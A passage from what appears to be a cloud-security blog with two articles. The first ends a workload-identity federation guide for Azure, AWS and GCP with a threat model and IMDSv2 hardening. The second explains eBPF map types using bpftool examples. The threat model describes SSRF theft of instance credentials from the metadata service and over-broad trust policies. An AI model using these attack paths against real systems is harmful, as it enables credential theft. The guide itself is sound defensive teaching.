  --enable-workload-identity

# Get the OIDC issuer URL for this cluster
OIDC_ISSUER=$(az aks show \
  --name my-aks --resource-group rg-prod \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Create a user-assigned managed identity for the workload
az identity create --name app-backend-identity --resource-group rg-identities
CLIENT_ID=$(az identity show --name app-backend-identity -g rg-identities --query clientId -o tsv)
PRINCIPAL_ID=$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)

# Grant the identity the access it needs
az role assignment create \
  --assignee-object-id "$PRINCIPAL_ID" \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Federate: trust the K8s service account from this cluster
az identity federated-credential create \
  --name aks-app-backend-binding \
  --identity-name app-backend-identity \
  --resource-group rg-identities \
  --issuer "${OIDC_ISSUER}" \
  --subject "system:serviceaccount:production:app-backend" \
  --audience "api://AzureADTokenExchange"

# Annotate the service account with the identity's client ID, and label the pod
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "CLIENT_ID_HERE"
---
apiVersion: v1
kind: Pod
metadata:
  name: app-backend
  namespace: production
  labels:
    azure.workload.identity/use: "true"   # triggers token injection
spec:
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest
    # Azure SDK DefaultAzureCredential picks up the injected token automatically

Cross-Cloud Federation — When AWS Talks to GCP

The same federation pattern works cross-cloud, although GCP’s AWS provider verifies an AWS-signed request rather than an OIDC JWT. An AWS Lambda function or EC2 instance can call GCP APIs without any GCP service account key on the AWS side:

# GCP side: create a workload identity pool that trusts AWS
gcloud iam workload-identity-pools create "aws-workloads" --location=global

gcloud iam workload-identity-pools providers create-aws "aws-provider" \
  --workload-identity-pool="aws-workloads" \
  --account-id="AWS_ACCOUNT_ID"

# Bind the specific AWS role to the GCP service account
gcloud iam service-accounts add-iam-policy-binding GCP_SA_EMAIL \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/GCP_PROJ_NUM/locations/global/workloadIdentityPools/aws-workloads/attribute.aws_role/arn:aws:sts::AWS_ACCOUNT:assumed-role/MyAWSRole"

The AWS workload uses its STS-issued temporary credentials to sign an sts:GetCallerIdentity request and presents that signed request to GCP’s Security Token Service. GCP has AWS validate the signature, checks the attribute mapping (only MyAWSRole from that AWS account), and issues a short-lived GCP access token. No GCP service account key is ever distributed to the AWS side.


The Threat Model — What Workload Identity Doesn’t Solve

Workload identity dramatically reduces the attack surface, but it doesn’t eliminate it:

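┌──────────────────────────┬────────────────────────────────────┬──────────────────────────────────────┐
│ Threat                   │ What still applies                 │ Mitigation                           │
├──────────────────────────┼────────────────────────────────────┼──────────────────────────────────────┤
│ Token theft from the     │ The projected token is readable    │ Short TTL (default 1h); tokens are   │
│ container filesystem     │ if you have container filesystem   │ audience-bound, so a K8s token       │
│                          │ access                             │ cannot call Azure APIs               │
├──────────────────────────┼────────────────────────────────────┼──────────────────────────────────────┤
│ SSRF to metadata service │ An SSRF vulnerability can fetch    │ Enforce IMDSv2 on AWS; use metadata  │
│                          │ credentials from the metadata      │ server restrictions on GKE/AKS       │
│                          │ endpoint                           │                                      │
├──────────────────────────┼────────────────────────────────────┼──────────────────────────────────────┤
│ Overpermissioned service │ Workload identity doesn’t enforce  │ One SA per workload; review          │
│ account                  │ least privilege; the SA can still  │ permissions against actual usage     │
│                          │ be over-granted                    │                                      │
├──────────────────────────┼────────────────────────────────────┼──────────────────────────────────────┤
│ Trust policy too broad   │ OIDC trust policy allows any       │ Always pin to specific SA name in    │
│                          │ service account in a namespace     │ the sub condition                    │
└──────────────────────────┴────────────────────────────────────┴──────────────────────────────────────┘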

The SSRF-to-metadata-service path deserves particular attention. IMDSv2 requires a PUT request to obtain a session token before any metadata request, and that token must then be sent as a header on every call. This blocks most SSRF scenarios, because a simple SSRF can only make GET requests. Enforce it:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP: no instance can launch without IMDSv2
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": "ec2:RunInstances",
    "Resource": "arn:aws:ec2:*:*:instance/*",
    "Condition": {
      "StringNotEquals": {
        "ec2:MetadataHttpTokens": "required"
      }
    }
  }]
}
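
For readers who have not seen the IMDSv2 handshake itself, here is a minimal Python sketch of the two requests. The endpoint paths and header names are the documented IMDSv2 ones; the helper names are mine, and fetch_metadata only works when run on an EC2 instance, so it is defined but not called here.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: a PUT that asks IMDS for a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: a GET that must carry the session token as a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_metadata(path: str) -> str:
    """Run both steps. Only meaningful on an EC2 instance."""
    with urllib.request.urlopen(token_request(), timeout=2) as resp:
        token = resp.read().decode()
    with urllib.request.urlopen(metadata_request(path, token), timeout=2) as resp:
        return resp.read().decode()


print(token_request().get_method())                       # PUT
print(metadata_request("instance-id", "t").get_method())  # GET
```

An attacker who can only make a vulnerable server issue a GET to an arbitrary URL cannot complete step 1, which is why requiring tokens removes the simplest SSRF path to instance credentials.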

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Trust policy scoped to namespace, not service account ║
║                                                                      ║
║  A condition like "sub": "system:serviceaccount:production:*"        ║
║  grants any pod in the production namespace the ability to assume    ║
║  the role. A compromised or new workload in that namespace gets      ║
║  access automatically.                                               ║
║                                                                      ║
║  Fix: always pin the sub condition to the exact service account      ║
║  name. "system:serviceaccount:production:app-backend" — not a glob.  ║
╚══════════════════════════════════════════════════════════════════════╝
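
A quick way to catch this in review is to scan trust policies for wildcard sub conditions. The sketch below is a hypothetical audit helper that works on a trust policy already loaded as a dictionary. It flags only wildcard-capable operators such as StringLike, since a literal * under StringEquals does not act as a wildcard.

```python
def broad_sub_conditions(trust_policy: dict) -> list:
    """Return sub-claim patterns that use wildcards under a *Like operator."""
    findings = []
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may not be wrapped in a list
        statements = [statements]
    for stmt in statements:
        for operator, conditions in stmt.get("Condition", {}).items():
            if "Like" not in operator:
                continue  # StringEquals compares literally; no wildcard expansion
            for key, value in conditions.items():
                if not key.endswith(":sub"):
                    continue
                values = value if isinstance(value, list) else [value]
                findings.extend(v for v in values if "*" in v or "?" in v)
    return findings


risky = {
    "Statement": [{
        "Effect": "Allow",
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {
            "StringLike": {"oidc.example/id/X:sub": "system:serviceaccount:production:*"}
        },
    }]
}
pinned = {
    "Statement": [{
        "Effect": "Allow",
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {
            "StringEquals": {"oidc.example/id/X:sub": "system:serviceaccount:production:app-backend"}
        },
    }]
}

print(broad_sub_conditions(risky))   # ['system:serviceaccount:production:*']
print(broad_sub_conditions(pinned))  # []
```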

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Shared service accounts across workloads             ║
║                                                                      ║
║  Reusing one service account for multiple workloads saves setup      ║
║  time and creates a lateral movement path. A compromised workload    ║
║  that shares a service account with a payment processor has payment  ║
║  processor permissions.                                              ║
║                                                                      ║
║  Fix: one service account per workload. The overhead is low.         ║
║  The blast radius reduction is significant.                          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — IMDSv1 still reachable after enabling IMDSv2        ║
║                                                                      ║
║  Enabling IMDSv2 on new instances doesn't affect existing ones.      ║
║  The SCP approach enforces it at the org level going forward, but    ║
║  existing instances need explicit remediation.                       ║
║                                                                      ║
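║  Fix: audit existing instances for IMDSv1 exposure, then require     ║
║  tokens on each instance it finds.                                   ║
║  aws ec2 describe-instances --query                                  ║
║    "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']║
║    .[InstanceId,Tags]"                                               ║
║  aws ec2 modify-instance-metadata-options \                          ║
║    --instance-id INSTANCE_ID --http-tokens required                  ║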
╚══════════════════════════════════════════════════════════════════════╝
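
If you already have the describe-instances output as JSON, the same audit is a few lines of Python. This sketch assumes a dictionary shaped like the EC2 DescribeInstances response; the function name and the sample data are hypothetical.

```python
def instances_allowing_imdsv1(describe_instances_response: dict) -> list:
    """Return IDs of instances whose metadata options do not require tokens."""
    ids = []
    for reservation in describe_instances_response.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            http_tokens = instance.get("MetadataOptions", {}).get("HttpTokens")
            if http_tokens != "required":
                ids.append(instance["InstanceId"])
    return ids


# Hand-written sample in the shape of a DescribeInstances response.
sample = {
    "Reservations": [
        {"Instances": [
            {"InstanceId": "i-aaa", "MetadataOptions": {"HttpTokens": "required"}},
            {"InstanceId": "i-bbb", "MetadataOptions": {"HttpTokens": "optional"}},
        ]},
        {"Instances": [
            {"InstanceId": "i-ccc"},  # missing options are treated as not enforced
        ]},
    ]
}

print(instances_allowing_imdsv1(sample))  # ['i-bbb', 'i-ccc']
```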

Quick Reference

┌────────────────────────────────┬───────────────────────────────────────────────────────┐
│ Term                           │ What it means                                         │
├────────────────────────────────┼───────────────────────────────────────────────────────┤
│ Workload identity federation   │ OIDC-based exchange: runtime JWT → short-lived token  │
│ IRSA                           │ IAM Roles for Service Accounts — EKS + OIDC pattern   │
│ EKS Pod Identity               │ Newer, simpler IRSA replacement — no OIDC setup       │
│ GKE Workload Identity          │ K8s SA → GCP SA via workload pool + IAM binding       │
│ AKS Workload Identity          │ K8s SA → managed identity via federated credential    │
│ IAM Roles Anywhere             │ AWS temp credentials for on-prem via X.509 cert       │
│ IMDSv2                         │ Token-gated AWS metadata service — blocks SSRF        │
│ OIDC sub claim                 │ Workload's unique identity string — use for pinning   │
│ Projected service account token│ K8s-injected JWT — the OIDC token pods present to AWS │
└────────────────────────────────┴───────────────────────────────────────────────────────┘

Key commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list OIDC providers registered in this account                               │
│  aws iam list-open-id-connect-providers                                               │
│                                                                                        │
│  # AWS — list Pod Identity associations for a cluster                                 │
│  aws eks list-pod-identity-associations --cluster-name my-cluster                     │
│                                                                                        │
│  # AWS — verify what credentials a pod is actually using                              │
│  aws sts get-caller-identity   # run from inside the pod                              │
│                                                                                        │
│  # AWS — audit instances missing IMDSv2                                               │
│  aws ec2 describe-instances \                                                          │
│    --query "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']          │
│    .[InstanceId]" --output text                                                        │
│                                                                                        │
│  # GCP — verify workload identity binding on a GCP service account                   │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL                                  │
│                                                                                        │
│  # GCP — list workload identity pools                                                 │
│  gcloud iam workload-identity-pools list --location=global                            │
│                                                                                        │
│  # Azure — list federated credentials on a managed identity                           │
│  az identity federated-credential list \                                               │
│    --identity-name app-backend-identity --resource-group rg-identities                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

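┌────────────────┬────────────────────────────┬────────────────────────────────────────────────────┐
│ Framework      │ Reference                  │ What it covers here                                │
├────────────────┼────────────────────────────┼────────────────────────────────────────────────────┤
│ CISSP          │ Domain 5: Identity and     │ Non-human identities dominate cloud environments;  │
│                │ Access Management          │ workload identity federation is the modern machine │
│                │                            │ authentication pattern                             │
├────────────────┼────────────────────────────┼────────────────────────────────────────────────────┤
│ CISSP          │ Domain 1: Security & Risk  │ Static credential sprawl is a measurable,          │
│                │ Management                 │ eliminable risk; workload identity removes it at   │
│                │                            │ the root                                           │
├────────────────┼────────────────────────────┼────────────────────────────────────────────────────┤
│ ISO 27001:2022 │ 5.17 Authentication        │ Managing machine credentials: workload identity    │
│                │ information                │ replaces long-lived secrets with short-lived,      │
│                │                            │ environment-bound tokens                           │
├────────────────┼────────────────────────────┼────────────────────────────────────────────────────┤
│ ISO 27001:2022 │ 8.5 Secure authentication  │ OIDC token exchange is the secure authentication   │
│                │                            │ mechanism for machine identities                   │
├────────────────┼────────────────────────────┼────────────────────────────────────────────────────┤
│ ISO 27001:2022 │ 5.18 Access rights         │ Service account provisioning and deprovisioning:   │
│                │                            │ workload identity ties access to the runtime       │
│                │                            │ environment, not a stored secret                   │
├────────────────┼────────────────────────────┼────────────────────────────────────────────────────┤
│ SOC 2          │ CC6.1                      │ Workload identity federation is the preferred      │
│                │                            │ technical control for machine-to-cloud             │
│                │                            │ authentication in CC6.1                            │
├────────────────┼────────────────────────────┼────────────────────────────────────────────────────┤
│ SOC 2          │ CC6.7                      │ Short-lived, audience-bound tokens restrict        │
│                │                            │ credential reuse across systems; addresses         │
│                │                            │ transmission and access controls                   │
└────────────────┴────────────────────────────┴────────────────────────────────────────────────────┘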

Key Takeaways

  • Static credentials for machine identities are the problem, not the solution — workload identity federation eliminates them at the root
  • The OIDC token exchange pattern is consistent across AWS (IRSA/Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, the others are a translation
  • AWS EKS: use Pod Identity for new clusters; IRSA remains the pattern for existing ones — both eliminate static keys
  • GCP GKE: Workload Identity enabled at cluster level, SA annotation at the K8s service account level
  • Azure AKS: federated credential on the managed identity, azure.workload.identity/use: "true" label on pods
  • Cross-cloud federation works — an AWS IAM role can call GCP APIs without a GCP key file
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; apply least privilege to the underlying cloud identity

What’s Next

You’ve eliminated the static credential problem. The next question is: what happens when the IAM configuration itself is the vulnerability? AWS IAM privilege escalation goes into the attack paths — how iam:PassRole, iam:CreateAccessKey, and misconfigured trust policies turn IAM misconfigurations into full account compromise. If you’re designing or auditing cloud access control, you need to know these paths before an attacker finds them.

Next: AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise


eBPF Maps — The Persistent Data Layer Between Kernel and Userspace

Reading Time: 10 minutes

eBPF: From Kernel to Cloud, Episode 5


TL;DR

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

The Big Picture

  HOW eBPF MAPS CONNECT KERNEL PROGRAMS TO USERSPACE TOOLS

  ┌─────────────────────────────────────────────────────────────┐
  │  Kernel space                                               │
  │                                                             │
  │  [XDP program]  [TC program]  [kprobe]  [tracepoint]        │
  │        │              │           │           │             │
  │        └──────────────┴───────────┴───────────┘             │
  │                              │                              │
  │                   bpf_map_update_elem()                     │
  │                              │                              │
  │                              ▼                              │
  │  ┌─────────────────────────────────────────────────────┐    │
  │  │             eBPF MAP (kernel object)                │    │
  │  │  hash · percpu_hash · lru_hash · ringbuf · lpm_trie │    │
  │  │  Lives outside program invocations.                 │    │
  │  │  Pinned maps (/sys/fs/bpf/) survive restarts.       │    │
  │  └────────────────────┬────────────────────────────────┘    │
  └───────────────────────│─────────────────────────────────────┘
                          │  read / write via file descriptor
                          ▼
  ┌─────────────────────────────────────────────────────────────┐
  │  Userspace tools                                            │
  │                                                             │
  │  Cilium agent  Falco engine  Tetragon  bpftool map dump     │
  └─────────────────────────────────────────────────────────────┘

eBPF maps are the persistent data layer between kernel programs and the tools that consume their output. eBPF programs fire and exit — there’s no memory between invocations. Yet Cilium tracks TCP connections across millions of packets, and Falco correlates a process exec from five minutes ago with a suspicious network connection happening now. The mechanism between stateless kernel programs and the stateful production tools you depend on is what this episode is about — and understanding it changes what you see when you run bpftool map list.


I was trying to identify the noisy neighbor saturating a cluster’s egress link. I had an eBPF program loading cleanly, events firing, everything confirming it was working. But when I read back the per-port connection counters from userspace, everything was zero.

I spent an hour on it before posting to the BCC mailing list. The reply came back fast: eBPF programs don’t hold state between invocations. Every time the kprobe fires, the program starts fresh. The counter I was incrementing existed only for that single call — created, incremented to one, then discarded. On every single invocation. I was counting events one at a time, throwing the count away, and reading nothing.

That’s what eBPF maps solve.
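
The failure is easy to reproduce outside the kernel. The Python sketch below is only an analogy, not eBPF code: one handler keeps its counter in a local variable, the way my broken program did, and the other writes to a dictionary that stands in for a map. All names are hypothetical.

```python
def handler_without_map(event: dict) -> int:
    """Mimics a stateless program: the counter is recreated on every call."""
    count = 0
    count += 1
    return count  # discarded as soon as the invocation ends


def handler_with_map(event: dict, counters: dict) -> None:
    """Mimics a program that stores state in a map that outlives the call."""
    port = event["port"]
    counters[port] = counters.get(port, 0) + 1


shared_map = {}  # stands in for an eBPF hash map keyed by port
events = [{"port": 443}, {"port": 443}, {"port": 80}]

local_results = []
for event in events:
    local_results.append(handler_without_map(event))
    handler_with_map(event, shared_map)

print(local_results)  # [1, 1, 1]
print(shared_map)     # {443: 2, 80: 1}
```

The first handler never gets past one, no matter how many events fire. The second accumulates, because the state lives outside the invocation.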

Maps Are the Architecture, Not an Afterthought

Maps are kernel objects that live outside any individual program invocation. They’re shared between multiple eBPF programs, readable and writable from userspace, and persistent for the lifetime of the map — which can outlive both the program that created them and the userspace process that loaded them.

Every production eBPF tool is fundamentally a map-based architecture:

  • Cilium stores connection tracking state in BPF hash maps
  • Falco uses ring buffers to stream syscall events to its userspace rule engine
  • Tetragon maintains process tree state across exec events using maps
  • Datadog NPM stores per-connection flow stats in per-CPU maps for lock-free metric accumulation

Run bpftool map list on a Cilium node:

$ bpftool map list
ID 12: lru_hash      name cilium_ct4_glo    key 24B  value 56B   max_entries 65536
ID 13: lpm_trie      name cilium_ipcache    key 40B  value 32B   max_entries 512000
ID 14: percpu_hash   name cilium_metrics    key 8B   value 32B   max_entries 65536
ID 28: ringbuf       name falco_events      max_entries 8388608

Connection tracking, IP policy cache, per-CPU metrics, event stream. Every one of these is a different map type, chosen for a specific reason.

Map Types and What They’re Actually Used For

Hash Maps

The general-purpose key-value store. A key maps to a value, and lookup is O(1) on average. Cilium’s connection tracking map (cilium_ct4_glo) is a hash map, specifically the LRU variant covered below: the key is a 5-tuple (source IP, destination IP, ports, protocol), the value is the connection state.

$ bpftool map show id 12
12: lru_hash  name cilium_ct4_glo  flags 0x0
        key 24B  value 56B  max_entries 65536  memlock 5767168B

The key 24B is the 5-tuple. The value 56B is the connection state record. max_entries 65536 is the upper bound — Cilium can track 65,536 active connections in this map before hitting the limit.

Hash maps are shared across all CPUs on the node. When multiple CPUs try to update the same entry simultaneously — which happens constantly on busy nodes — writes need to be coordinated. For most use cases this is fine. For high-frequency counters updated on every packet, it’s a bottleneck. That’s when you reach for a per-CPU hash map.

Where you see them: connection tracking, per-IP statistics, process-to-identity mapping, policy verdict caching.

Per-CPU Hash Maps

Per-CPU hash maps solve the write coordination problem by giving each CPU its own independent copy of every entry. There’s no sharing, no contention, no waiting — each CPU writes its own copy without touching any other.

The tradeoff: reading from userspace means collecting one value per CPU and summing them up. That aggregation happens in the tool, not the kernel.

# Cilium's per-CPU metrics map — one counter value per CPU
bpftool map dump id 14
key: 0x00000001
  value (CPU 00): 12345
  value (CPU 01): 8901
  value (CPU 02): 3421
  value (CPU 03): 7102
# total bytes for this metric: 31769

Cilium’s cilium_metrics map uses this pattern for exactly this reason — it’s updated on every packet across every CPU on the node. Forcing all CPUs to coordinate writes to a single shared entry at that rate would hurt throughput. Instead: each CPU writes locally, Cilium’s userspace agent sums the values at export time.

Where you see them: packet counters, byte counters, syscall frequency metrics — anywhere updates happen on every event at high volume.

LRU Hash Maps

LRU hash maps add automatic eviction. Same key-value semantics as a regular hash map, but when the map hits its entry limit, the least recently accessed entry is dropped to make room for the new one.

This matters for any map tracking dynamic state with an unpredictable number of keys: TCP connections, process IDs, DNS queries, pod IPs. Without LRU semantics, a full map returns an error on insert — and in production, that means your tool silently stops tracking new entries. Not a crash, not an alert — just missing data.
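The difference between the two failure modes can be modelled in a few lines. This is a simplified sketch: the class names are hypothetical, and the kernel's LRU implementation is approximate rather than the strict ordering that OrderedDict gives here.

```python
from collections import OrderedDict


class BoundedMap:
    """Plain bounded map: inserting a new key into a full map fails."""

    def __init__(self, max_entries: int) -> None:
        self.max_entries = max_entries
        self.entries: dict = {}

    def update(self, key, value) -> bool:
        if key not in self.entries and len(self.entries) >= self.max_entries:
            return False  # the caller has to notice and handle this
        self.entries[key] = value
        return True


class LruMap:
    """LRU bounded map: a full map evicts the least recently used key."""

    def __init__(self, max_entries: int) -> None:
        self.max_entries = max_entries
        self.entries: OrderedDict = OrderedDict()

    def lookup(self, key):
        if key in self.entries:
            self.entries.move_to_end(key)  # mark as recently used
            return self.entries[key]
        return None

    def update(self, key, value) -> None:
        if key in self.entries:
            self.entries.move_to_end(key)
        elif len(self.entries) >= self.max_entries:
            self.entries.popitem(last=False)  # evict the oldest entry
        self.entries[key] = value


plain = BoundedMap(max_entries=2)
plain.update("conn-a", 1)
plain.update("conn-b", 1)
print(plain.update("conn-c", 1))  # False

lru = LruMap(max_entries=2)
lru.update("conn-a", 1)
lru.update("conn-b", 1)
lru.lookup("conn-a")      # conn-a becomes the most recently used entry
lru.update("conn-c", 1)   # evicts conn-b
print(list(lru.entries))  # ['conn-a', 'conn-c']
```

Neither outcome raises an alert by itself: the plain map loses the new entry, the LRU map loses an old one.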

Cilium’s connection tracking map is LRU-bounded at 65,536 entries. On a node handling high-connection-rate workloads, this can fill up. When it does, Cilium starts evicting old connections to make room for new ones — and if it’s evicting too aggressively, you’ll see connection resets.

# Check current CT map usage vs its limit
bpftool map show id 12
# max_entries tells you the ceiling
# count entries to see current usage
bpftool map dump id 12 | grep -c "^key"

Size LRU maps at 2× your expected concurrent active entries. Aggressive eviction under pressure introduces gaps — not crashes, but missing or incorrect state.

Where you see them: connection tracking, process lineage, anything where the key space is dynamic and unbounded.

Ring Buffers

Ring buffers are how eBPF tools stream events from the kernel to a userspace consumer. Falco reads syscall events from a ring buffer. Tetragon streams process execution and network events through ring buffers. The pattern is the same across all of them:

kernel eBPF program
  → sees event (syscall, network packet, process exec)
  → writes record to ring buffer
  → userspace tool reads it and processes (Falco rules, Tetragon policies)

What makes ring buffers the right primitive for event streaming:

  • Single buffer shared across all CPUs — unlike the older perf_event_array approach which required one buffer per CPU, a ring buffer is one allocation, one file descriptor, one consumer
  • Lock-free — the kernel writes, the userspace tool reads, they don’t block each other
  • Drop-on-full rather than backpressure: if the userspace tool can’t keep up, new events are dropped rather than queued indefinitely. The tool can detect and count drops. Falco reports these as Dropped events in its stats output.

# Falco's ring buffer — 8MB
bpftool map list | grep ringbuf
# ID 28: ringbuf  name falco_events  max_entries 8388608

8,388,608 bytes = 8MB. That’s the buffer between Falco’s kernel hooks and its rule engine. If there’s a burst of syscall activity and Falco’s rule evaluation can’t keep up, the buffer fills and any events that arrive while it is full are lost.
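To make the drop behaviour concrete, here is a toy model of a fixed-size event buffer. It is only a sketch under simplifying assumptions: the class and method names are hypothetical, and it ignores the record headers and memory layout of the real kernel ring buffer.

```python
from collections import deque


class EventRing:
    """Fixed byte budget; a full ring drops new events and counts them."""

    def __init__(self, capacity_bytes: int) -> None:
        self.capacity_bytes = capacity_bytes
        self.used_bytes = 0
        self.dropped = 0
        self._events: deque = deque()

    def produce(self, event: bytes) -> bool:
        """Producer side: refuse the event if it does not fit."""
        if self.used_bytes + len(event) > self.capacity_bytes:
            self.dropped += 1
            return False
        self._events.append(event)
        self.used_bytes += len(event)
        return True

    def consume(self):
        """Consumer side: reading an event frees its space."""
        if not self._events:
            return None
        event = self._events.popleft()
        self.used_bytes -= len(event)
        return event


ring = EventRing(capacity_bytes=8)
for _ in range(3):
    ring.produce(b"evnt")     # 4 bytes each; the third does not fit
print(ring.dropped)           # 1
ring.consume()                # the consumer frees 4 bytes
print(ring.produce(b"evnt"))  # True
```

The drop counter only grows while the consumer is behind, which is why drop rate under load is the signal to watch when sizing.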

Sizing matters operationally. Too small and you drop events during normal burst. Too large and you’re holding non-pageable kernel memory that doesn’t show up in standard memory metrics.

# Check Falco's drop rate in its logs
journalctl -u falco | grep -i "drop"

Most production deployments run 8–32MB. Start at 8MB, monitor drop rates under load, size up if needed.

Where you see them: Falco event streaming, Tetragon audit events, any tool that needs to move high-volume event data from kernel to userspace.

Array Maps

Array maps are fixed-size, integer-indexed, and entirely pre-allocated at creation time. Think of them as lookup tables with integer keys — constant-time access, no hash overhead, no dynamic allocation.

Cilium uses array maps for policy configuration: a fixed set of slots indexed by endpoint identity number. When a packet arrives and Cilium needs to check policy, it indexes into the array directly rather than doing a hash lookup. For read-heavy, write-rare data, this is faster.

The constraint: you can’t delete entries from an array map. Every slot exists for the lifetime of the map. If you need to track state that comes and goes — connections, processes, pods — use a hash map instead.

Where you see them: policy configuration, routing tables with fixed indices, per-CPU stats indexed by CPU number.

LPM Trie Maps

LPM (Longest Prefix Match) trie maps handle IP prefix lookups — the same operation that a hardware router does when deciding which interface to send a packet out of.

You can store a mix of specific host addresses (/32) and CIDR ranges (/16, /24) in the same map, and a lookup returns the most specific match. If 10.0.1.15/32 and 10.0.0.0/8 are both in the map, a lookup for 10.0.1.15 returns the /32 entry.
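The lookup rule can be sketched in userspace with Python's ipaddress module. This is a linear scan for illustration, not a trie, and the table values are hypothetical labels rather than real Cilium identities.

```python
import ipaddress
from typing import Optional


def lpm_lookup(table: dict, address: str) -> Optional[str]:
    """Return the value stored under the most specific matching prefix."""
    ip = ipaddress.ip_address(address)
    best_key, best_len = None, -1
    for prefix in table:
        net = ipaddress.ip_network(prefix)
        if ip in net and net.prefixlen > best_len:
            best_key, best_len = prefix, net.prefixlen
    return table[best_key] if best_key is not None else None


# Hypothetical entries: one CIDR range and one host address.
table = {"10.0.0.0/8": "cluster-range", "10.0.1.15/32": "pod-identity"}
print(lpm_lookup(table, "10.0.1.15"))    # pod-identity
print(lpm_lookup(table, "10.2.3.4"))     # cluster-range
print(lpm_lookup(table, "192.168.1.1"))  # None
```

A trie reaches the same answer without scanning every entry, which is what makes it usable on the packet path.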

Cilium’s cilium_ipcache map is an LPM trie. It maps every IP in the cluster to its security identity — the identifier Cilium uses for policy enforcement. When a packet arrives, Cilium does a trie lookup on the source IP to find out which endpoint sent it, then checks policy against that identity.

# Inspect the ipcache map
bpftool map show id 13
# lpm_trie  name cilium_ipcache  key 40B  value 32B  max_entries 512000

# Look up which security identity owns a pod IP
bpftool map lookup id 13 key hex 20 00 00 00 0a 00 01 0f 00 00 00 00 00 00 00 00 00 00 00 00

Where you see them: IP-to-identity mapping (Cilium), CIDR-based policy enforcement, IP blocklists.


Pinned Maps — State That Survives Restarts

By default, a map’s lifetime is tied to the tool that created it. When the tool exits, the kernel garbage-collects the map.

Pinning writes a reference to the BPF filesystem at /sys/fs/bpf, which keeps the map alive even after the creating process exits:

# See all maps Cilium has pinned
ls /sys/fs/bpf/tc/globals/
# cilium_ct4_global  cilium_ipcache  cilium_metrics  cilium_policy ...

# Inspect a pinned map directly — no Cilium process needed
bpftool map dump pinned /sys/fs/bpf/tc/globals/cilium_ct4_global

# Pin any map by ID for manual inspection
bpftool map pin id 12 /sys/fs/bpf/my_conn_tracker
bpftool map dump pinned /sys/fs/bpf/my_conn_tracker

Cilium pins all its maps under /sys/fs/bpf/tc/globals/. When Cilium restarts — rolling upgrade, crash, OOM kill — it reopens its pinned maps and resumes with existing state intact. Pods maintain established TCP connections through a Cilium restart without disruption.

This is operationally significant: if you’re evaluating eBPF-based tools for production, check whether they pin their maps. A tool that doesn’t loses all its tracked state on every restart — connection tracking resets, process lineage gaps, policy state rebuilt from scratch.


Map Memory: A Production Consideration

Map memory is kernel-locked — it cannot be paged out, and it doesn’t show up in standard memory pressure metrics. Your node’s free output and container memory limits don’t account for it.

# Total eBPF map memory locked on this node
bpftool map list -j | python3 -c "
import json,sys
maps=json.load(sys.stdin)
total=sum(m.get('bytes_memlock',0) for m in maps)
print(f'Total map memory: {total/1024/1024:.1f} MB')
"

# Check system memlock limit (unlimited is correct for eBPF tools)
ulimit -l

# Check what Cilium's systemd unit sets
systemctl show cilium | grep -i memlock

On a node running Cilium + Falco + Datadog NPM, I’ve seen 200–400MB of map memory locked. That’s real, non-pageable kernel memory. If you’re sizing nodes for eBPF-heavy workloads, account for this separately from your pod workload memory.

If an eBPF tool fails to load with a permission error despite having enough free memory, the root cause is usually the memlock ulimit for the process. Cilium, Falco, and most production tools set LimitMEMLOCK=infinity in their systemd units. Verify this if you’re deploying a new eBPF-based tool and seeing unexpected load failures.


Inspecting Maps in Production

# List all maps: type, name, key/value sizes, memory usage
bpftool map list

# Dump all entries in a map (careful with large maps)
bpftool map dump id 12

# Look up a specific entry by key (the hex bytes must total the map's key size; shortened here)
bpftool map lookup id 12 key hex 0a 00 01 0f 00 00 00 00

# Watch map stats live
watch -n1 'bpftool map show id 12'

# See all maps for a specific tool by checking its pinned path
ls /sys/fs/bpf/tc/globals/                    # Cilium
ls /sys/fs/bpf/falco/                         # Falco (if pinned)

# Cross-reference map IDs with the programs using them
bpftool prog list
bpftool map list

⚠ Production Gotchas

A full LRU map drops state silently, not loudly
